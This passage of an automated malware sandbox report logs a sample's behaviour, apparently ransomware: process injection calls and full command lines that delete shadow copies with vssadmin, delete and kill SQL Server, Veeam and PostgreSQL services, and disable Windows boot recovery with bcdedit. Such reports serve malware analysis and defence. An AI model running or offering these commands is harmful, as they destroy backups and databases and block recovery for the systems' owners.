WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: base_address: 0x00401000 process_identifier: 2744 process_handle: 0x00000524	1	1
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: base_address: 0x00419000 process_identifier: 2744 process_handle: 0x00000524	1	1
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: base_address: 0x00423000 process_identifier: 2744 process_handle: 0x00000524	1	1
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: 0 H`}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00428000 process_identifier: 2744 process_handle: 0x00000524	1	1
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: base_address: 0x00429000 process_identifier: 2744 process_handle: 0x00000524	1	1
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2744 process_handle: 0x00000524	1	1
NtSetContextThread March 11, 2023, 10:28 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4231022 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000039c process_identifier: 2744	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 2744	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2140	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2140	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x0000044c suspend_count: 1 process_identifier: 2140	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x00000494 suspend_count: 1 process_identifier: 2140	1	0
CreateProcessInternalW March 11, 2023, 10:28 a.m.	thread_identifier: 2868 thread_handle: 0x0000029c process_identifier: 2864 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\sysnative\vssadmin.exe track: 1 command_line: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet filepath_r: C:\Windows\sysnative\vssadmin.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
CreateProcessInternalW March 11, 2023, 10:28 a.m.	thread_identifier: 2944 thread_handle: 0x0000032c process_identifier: 2940 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000320	1	1
CreateProcessInternalW March 11, 2023, 10:28 a.m.	thread_identifier: 2936 thread_handle: 0x0000030c process_identifier: 2932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000310	1	1
CreateProcessInternalW March 11, 2023, 10:28 a.m.	thread_identifier: 3064 thread_handle: 0x00000264 process_identifier: 3060 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000344	1	1
CreateProcessInternalW March 11, 2023, 10:28 a.m.	thread_identifier: 1688 thread_handle: 0x00000084 process_identifier: 804 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\sc.exe track: 1 command_line: sc delete "MSSQLFDLauncher" filepath_r: C:\Windows\system32\sc.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x0000009c suspend_count: 1 process_identifier: 804	1	0

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (8 events)

dead_host	192.168.56.1:139
dead_host	192.168.56.1:445
dead_host	192.168.56.1:135
dead_host	192.168.56.103:49190
dead_host	192.168.56.103:49185
dead_host	192.168.56.103:49187
dead_host	192.168.56.103:49186
dead_host	192.168.56.103:49189

a-Yfgvvxyduvu.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All